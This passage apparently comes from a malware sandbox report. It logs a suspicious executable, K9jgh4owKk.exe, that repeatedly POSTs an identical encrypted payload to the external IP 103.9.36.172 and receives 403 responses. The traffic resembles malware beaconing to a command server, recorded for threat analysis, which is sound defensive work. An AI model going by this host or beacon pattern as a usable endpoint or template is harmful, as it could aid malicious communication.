2021-12-31 08:53:23 UTC	104	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.7	49874	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:26 UTC	104	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:26 UTC	104	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:26 UTC	109	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.7	49877	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:29 UTC	109	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:29 UTC	109	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:30 UTC	114	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.7	49880	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:32 UTC	114	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:32 UTC	114	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:33 UTC	119	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.7	49884	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:35 UTC	119	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:35 UTC	119	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:36 UTC	124	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.7	49889	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:38 UTC	124	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:38 UTC	124	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:39 UTC	129	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.7	49892	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:41 UTC	129	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:41 UTC	129	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:42 UTC	134	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.7	49904	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:44 UTC	134	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:44 UTC	134	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:45 UTC	139	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.7	49908	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:47 UTC	139	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:47 UTC	139	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:48 UTC	144	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.7	49911	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:51 UTC	144	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:51 UTC	144	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:51 UTC	149	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49772	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:26 UTC	14	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:26 UTC	15	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:27 UTC	19	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.7	49914	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:54 UTC	149	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:54 UTC	149	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:54 UTC	154	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:52:58 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.7	49917	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:53:57 UTC	154	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:53:57 UTC	154	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:53:57 UTC	159	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:53:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.7	49920	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:54:00 UTC	159	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:54:00 UTC	159	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:54:00 UTC	164	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:53:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.7	49924	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:54:03 UTC	164	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:54:03 UTC	164	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:54:04 UTC	169	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:53:07 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.7	49927	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:54:06 UTC	169	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
